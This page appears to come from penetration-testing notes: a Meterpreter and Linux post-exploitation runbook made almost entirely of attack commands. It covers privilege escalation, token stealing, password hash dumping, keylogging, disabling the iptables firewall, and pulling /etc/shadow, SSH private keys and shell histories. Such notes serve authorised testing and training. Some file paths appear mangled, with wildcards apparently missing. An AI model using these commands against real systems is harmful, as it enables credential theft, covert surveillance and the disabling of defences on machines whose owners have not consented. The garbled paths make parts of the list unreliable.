Meterpreter Post-Auth Runbook

Meterpreter Post-exploitation Modules ◇ > use post/windows/gather/enum_logged_on_users ◇ Railgun - Meterpreter extension that allows direct access to Windows APIs ◇ IRB - ruby shell in meterpreter

Meterpreter Post Auth

  • Info gathering

    • getuid

    • getpid

    • getsprivs

    • sysinfo

    • screenshot

    • run winenum.rb

    • run scraper.rb

    • run checkvm

    • run credscollect

    • run get_local_subnets

  • Priv Esc

    • ps then migrate

    • getsystem

  • Tokens

    • list_tokens -u

    • impersonate_token

    • steal_token [pid]

    • rev2self

  • Retrieve passwords

    • hashdump

    • cachedump

    • post/windows/gather/smart_hashdump

    • post/windows/gather/credentials/vnc

  • Session

    • enumdesktops

    • getdesktop

    • setdesktop

    • uictl disable keyboard

  • keylog

    • keyscan_start

    • keyscan_dump

    • keyscan_stop

    • Nix Post Auth

  • Disable Firewall

    • /etc/init.d/iptables save

    • /etc/init.d/iptables stop

    • iptables-save > root/firewall.rules

    • iptables-restore < /root/firewall.rules

  • Files to pull

    • /etc/passwd

    • /etc/shadow OR /etc/security/shadow

    • /etc/groups OR /etc/gshadow

    • /home//.ssh/id

    • /etc/sudoers

  • User Information

    • grep ^ssh /home//.hist

    • grep ^telnet /home//.hist

    • grep ^mysql /home//.hist*

PreviousPrivilege EscalationNextAttacking Active Directory

Last updated